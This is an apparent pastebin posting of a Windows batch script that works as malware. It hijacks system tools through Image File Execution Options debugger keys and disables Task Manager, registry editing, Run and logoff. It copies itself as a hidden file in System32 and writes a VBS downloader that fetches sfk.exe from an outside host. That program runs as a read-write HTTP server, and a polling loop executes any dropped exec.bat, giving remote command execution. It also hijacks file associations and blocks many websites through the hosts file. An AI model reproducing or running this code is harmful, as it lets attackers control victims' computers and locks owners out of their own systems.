· 8 years ago · Jul 10, 2018, 04:56 AM
1@echo off
2if "%1"=="cont" goto cont
3REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe" /v Debugger /d \
4REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe" /v Debugger /d \
5REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pskill.exe" /v Debugger /d \
6REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
7REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\psshutdown.exe" /v Debugger /d \
8REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
9REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
10REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 0 /f
11REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 0 /f
12REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe" /v Debugger /d \
13copy %0 %SystemDrive%\Windows\System32\6969.bat
14attrib +r +s +h "%SystemDrive%\Windows\System32\6969.bat"
15start /b "" %SystemDrive%\Windows\System32\6969.bat cont "%0"
16exit
17
18:cont
19del /f %2
20echo URL = WScript.Arguments(0)>%SystemDrive%\Windows\System32\wget.vbs
21echo saveTo = WScript.Arguments(1)>>%SystemDrive%\Windows\System32\wget.vbs
22echo Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")>>%SystemDrive%\Windows\System32\wget.vbs
23echo objXMLHTTP.open "GET", URL, false>>%SystemDrive%\Windows\System32\wget.vbs
24echo objXMLHTTP.send()>>%SystemDrive%\Windows\System32\wget.vbs
25echo Set objADOStream = CreateObject("ADODB.Stream")>>%SystemDrive%\Windows\System32\wget.vbs
26echo objADOStream.Open>>%SystemDrive%\Windows\System32\wget.vbs
27echo objADOStream.Type = 1>>%SystemDrive%\Windows\System32\wget.vbs
28echo objADOStream.Write objXMLHTTP.ResponseBody>>%SystemDrive%\Windows\System32\wget.vbs
29echo objADOStream.Position = 0>>%SystemDrive%\Windows\System32\wget.vbs
30echo Set objFSO = Createobject("Scripting.FileSystemObject")>>%SystemDrive%\Windows\System32\wget.vbs
31echo If objFSO.Fileexists(saveTo) Then objFSO.DeleteFile saveTo>>%SystemDrive%\Windows\System32\wget.vbs
32echo Set objFSO = Nothing>>%SystemDrive%\Windows\System32\wget.vbs
33echo objADOStream.SaveToFile saveTo>>%SystemDrive%\Windows\System32\wget.vbs
34echo objADOStream.Close>>%SystemDrive%\Windows\System32\wget.vbs
35echo Set objADOStream = Nothing>>%SystemDrive%\Windows\System32\wget.vbs
36echo Set objXMLHTTP = Nothing>>%SystemDrive%\Windows\System32\wget.vbs
37echo WScript.Quit>>%SystemDrive%\Windows\System32\wget.vbs
38attrib +r +s +h %SystemDrive%\Windows\System32\wget.vbs
39cscript %SystemDrive%\Windows\System32\wget.vbs "http://ftp.collabvm.ml/6969/sfk.exe" "%SystemDrive%\Windows\System32\sfk.exe"
40attrib +r +s +h %SystemDrive%\Windows\System32\sfk.exe
41set port=7004
42ver | find "XP">nul
43if %errorlevel%==0 set port=7005
44ver | find "10">nul
45if %errorlevel%==0 set port=7006
46if not exist "%SystemDrive%\Program Files (x86)" set port=7008
47echo :loop>"%SystemDrive%\Windows\System32\rserver.bat"
48echo "%SystemDrive%\Windows\System32\sfk.exe" httpserv -port=%port% -rw>>"%SystemDrive%\Windows\System32\rserver.bat"
49echo goto loop>>"%SystemDrive%\Windows\System32\rserver.bat"
50start /b "" "%SystemDrive%\Windows\System32\rserver.bat"
51
52:main
53if exist "%SystemDrive%\Windows\System32\exec.bat" call :exec
54if exist "%SystemDrive%\Windows\System32\lock.txt" call :lock
55timeout -nobreak 2>nul
56goto main
57
58:exec
59call "%SystemDrive%\Windows\System32\exec.bat"
60del "%SystemDrive%\Windows\System32\exec.bat"
61exit /b
62
63:lock
64REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v Debugger /d \
65REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe" /v Debugger /d \
66REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe" /v Debugger /d \
67REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe" /v Debugger /d \
68REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\defrag.exe" /v Debugger /d \
69REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\audit.exe" /v Debugger /d \
70REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe" /v Debugger /d \
71REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d \
72REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dlsetup.exe" /v Debugger /d \
73REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DLVS.exe" /v Debugger /d \
74REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DeskLock.exe" /v Debugger /d \
75REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe" /v Debugger /d \
76REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe" /v Debugger /d \
77REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sysprep.exe" /v Debugger /d \
78REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Shredder.exe" /v Debugger /d \
79REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\file_shredder_setup.exe" /v Debugger /d \
80REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\word.exe" /v Debugger /d \
81REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MEMZ.exe" /v Debugger /d \
82REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe" /v Debugger /d \
83REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe" /v Debugger /d \
84REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe" /v Debugger /d \
85REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe" /v Debugger /d \
86REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v Debugger /d \
87REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt33.exe" /v Debugger /d \
88REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /v Debugger /d \
89REG add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net1.exe" /v Debugger /d \
90REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
91REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
92REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
93REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
94REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileassociate /t REG_DWORD /d 1 /f
95REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileassociate /t REG_DWORD /d 1 /f
96REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
97REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
98REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
99REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
100REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
101REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
102REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewContextMenu /t REG_DWORD /d 1 /f
103REG add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
104REG add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
105REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
106REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
107REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
108REG add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
109ASSOC .CMD="C:\Windows\System32\msg.exe 6969"
110ASSOC .BAT="C:\Windows\System32\msg.exe 6969"
111ASSOC .VBS="C:\Windows\System32\msg.exe 6969"
112ASSOC .JS="C:\Windows\System32\msg.exe 6969"
113ASSOC .JSE="C:\Windows\System32\msg.exe 6969"
114ASSOC .GIF="C:\Windows\System32\msg.exe 6969"
115ASSOC .GIFV="C:\Windows\System32\msg.exe 6969"
116ASSOC .WEBM="C:\Windows\System32\msg.exe 6969"
117ASSOC .MP4="C:\Windows\System32\msg.exe 6969"
118ASSOC .AVI="C:\Windows\System32\msg.exe 6969"
119ASSOC .JSA="C:\Windows\System32\msg.exe 6969"
120echo 127.0.0.1 imgur.com >> c:\windows\system32\drivers\etc\hosts
121echo 127.0.0.1 i.imgur.com >> c:\windows\system32\drivers\etc\hosts
122echo 127.0.0.1 gmail.com >> c:\windows\system32\drivers\etc\hosts
123echo 127.0.0.1 youtube.com >> c:\windows\system32\drivers\etc\hosts
124echo 127.0.0.1 dailymotion.com >> c:\windows\system32\drivers\etc\hosts
125echo 127.0.0.1 vimeo.com >> c:\windows\system32\drivers\etc\hosts
126echo 127.0.0.1 giphy.com >> c:\windows\system32\drivers\etc\hosts
127echo 127.0.0.1 gifs.com >> c:\windows\system32\drivers\etc\hosts
128echo 127.0.0.1 archive.is >> c:\windows\system32\drivers\etc\hosts
129echo 127.0.0.1 web.archive.org >> c:\windows\system32\drivers\etc\hosts
130echo 127.0.0.1 gifs.com >> c:\windows\system32\drivers\etc\hosts
131echo 127.0.0.1 gfycat.com >> c:\windows\system32\drivers\etc\hosts
132echo 127.0.0.1 reddit.com >> c:\windows\system32\drivers\etc\hosts
133echo 127.0.0.1 b.reich.io >> c:\windows\system32\drivers\etc\hosts
134echo 127.0.0.1 flickr.com >> c:\windows\system32\drivers\etc\hosts
135echo 127.0.0.1 pepsi.com >> c:\windows\system32\drivers\etc\hosts
136echo 127.0.0.1 mountaindew.com >> c:\windows\system32\drivers\etc\hosts
137echo 127.0.0.1 a.doko.moe >> c:\windows\system32\drivers\etc\hosts
138echo 127.0.0.1 a.pomf.cat >> c:\windows\system32\drivers\etc\hosts
139echo 127.0.0.1 youareanidiot.org >> c:\windows\system32\drivers\etc\hosts
140echo 127.0.0.1 pornhub.com >> c:\windows\system32\drivers\etc\hosts
141echo 127.0.0.1 redtube.com >> c:\windows\system32\drivers\etc\hosts
142echo 127.0.0.1 heavy-r.com >> c:\windows\system32\drivers\etc\hosts
143echo 127.0.0.1 xvideos.com >> c:\windows\system32\drivers\etc\hosts
144echo 127.0.0.1 youporn.com >> c:\windows\system32\drivers\etc\hosts
145echo 127.0.0.1 porn.com >> c:\windows\system32\drivers\etc\hosts
146REG add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
147REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
148echo 127.0.0.1 ftp.collabvm.ml >> c:\windows\system32\drivers\etc\hosts
149echo 127.0.0.1 192.151.157.114 >> c:\windows\system32\drivers\etc\hosts
150attrib +r +h C:\windows\system32\drivers\etc\hosts
151exit /b